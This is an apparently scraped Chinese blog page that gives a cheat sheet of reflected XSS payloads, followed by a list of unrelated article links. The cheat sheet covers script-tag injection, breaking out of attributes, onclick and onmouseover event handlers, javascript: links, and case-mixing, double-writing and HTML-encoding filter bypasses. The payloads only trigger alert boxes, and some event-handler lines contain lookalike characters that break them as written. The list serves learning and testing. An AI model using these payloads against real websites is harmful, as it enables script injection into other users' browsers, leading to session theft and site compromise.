当前位置: 首页 > news >正文

反射型xss的常用语法

Xss反射型常用语法:

  1. 普通语法:  <script>alert(1)</script>
  2. 构造闭合语法:  "><script>alert(1)</script>
  3. 当引号被转义时的语法:   1' οnclick='alert(2)' 再次点击输入框时就会出现弹窗
  4. 当3.的双引号不行时则考虑使用双引号:1 "onclick"=alert(2)
  5. 当</>被过滤时便不能用标签可以考虑使用出发事件: 1"  οnmοuseοver="alert(1)"
  6. 当5.的双引号不行时则考虑使用单引号:  1'  οnmοuseοver='alert(1)'
  7. 当上述几种都不行时可以考虑使用a标签:11"><a href="javascript:alert(1)">
  8. 大小写绕过:11"><a HREF="javascript:alert(1)">      "><sCript>alert(1)</scRipt>

<SCRIPT>alert(1)</SCRIPT>

    9.双写绕过:"><SCRSCRIPTIPT>alert(/xss/)</SCRSCRIPTIPT>

    10.Html编码绕过:

javaSCRIPT:alert(1)

这里属于直接编码所所有的进行

把所需要过滤的字段进行html编码就可以进行绕过,这里绕过的时比如

href     href

SCRIPT    SCRIPT

相关文章:

  • 二叉树 经典例题
  • 重装系统以后无法git跟踪
  • 爬虫工作量由小到大的思维转变---<第二十八章 Scrapy中间件说明书>
  • Delphi6函数大全4-SysUtils.pas
  • linux查看系统版本、内核版本、CPU核数/线程/型号、内存大小等
  • lambda表达式和包装器
  • 分布式IO在工业自动化中的应用
  • 【教学类-43-11】 20231231 3*3宫格数独提取单元格坐标数字的通用模板(做成2*2=4套、3*2=6套)
  • 【Leetcode】1154. 一年中的第几天
  • Go语言程序设计-第6章--方法
  • 解决SpringBoot中出现的跨域请求问题
  • RainBond 构建组件 rbd-chaos 故障解决 【真实案例】
  • 单例模式的双重检查锁定是什么?
  • 如何使用ModuleShifting测试Module Stomping和Module Overloading注入技术
  • LeetCode75| 二叉搜索树
  • 【Leetcode】104. 二叉树的最大深度
  • 5、React组件事件详解
  • chrome扩展demo1-小时钟
  • ES6系列(二)变量的解构赋值
  • JavaScript 无符号位移运算符 三个大于号 的使用方法
  • PAT A1120
  • QQ浏览器x5内核的兼容性问题
  • vue从创建到完整的饿了么(11)组件的使用(svg图标及watch的简单使用)
  • 动手做个聊天室,前端工程师百无聊赖的人生
  • 更好理解的面向对象的Javascript 1 —— 动态类型和多态
  • 腾讯视频格式如何转换成mp4 将下载的qlv文件转换成mp4的方法
  • 一个项目push到多个远程Git仓库
  • PostgreSQL之连接数修改
  • ​软考-高级-系统架构设计师教程(清华第2版)【第20章 系统架构设计师论文写作要点(P717~728)-思维导图】​
  • #FPGA(基础知识)
  • #if #elif #endif
  • $(selector).each()和$.each()的区别
  • %check_box% in rails :coditions={:has_many , :through}
  • (1)(1.8) MSP(MultiWii 串行协议)(4.1 版)
  • (1)(1.9) MSP (version 4.2)
  • (23)Linux的软硬连接
  • (Bean工厂的后处理器入门)学习Spring的第七天
  • (BFS)hdoj2377-Bus Pass
  • (delphi11最新学习资料) Object Pascal 学习笔记---第7章第3节(封装和窗体)
  • (Redis使用系列) Springboot 整合Redisson 实现分布式锁 七
  • (附源码)基于SSM多源异构数据关联技术构建智能校园-计算机毕设 64366
  • (含react-draggable库以及相关BUG如何解决)固定在左上方某盒子内(如按钮)添加可拖动功能,使用react hook语法实现
  • (紀錄)[ASP.NET MVC][jQuery]-2 純手工打造屬於自己的 jQuery GridView (含完整程式碼下載)...
  • (一)SpringBoot3---尚硅谷总结
  • (转)Linq学习笔记
  • (转)MVC3 类型“System.Web.Mvc.ModelClientValidationRule”同时存在
  • (转载)利用webkit抓取动态网页和链接
  • .NET 5.0正式发布,有什么功能特性(翻译)
  • .NET CORE 2.0发布后没有 VIEWS视图页面文件
  • .NET Framework Client Profile - a Subset of the .NET Framework Redistribution
  • .NET 某和OA办公系统全局绕过漏洞分析
  • .net下简单快捷的数值高低位切换
  • .NET正则基础之——正则委托
  • .php结尾的域名,【php】php正则截取url中域名后的内容
  • @cacheable 是否缓存成功_让我们来学习学习SpringCache分布式缓存,为什么用?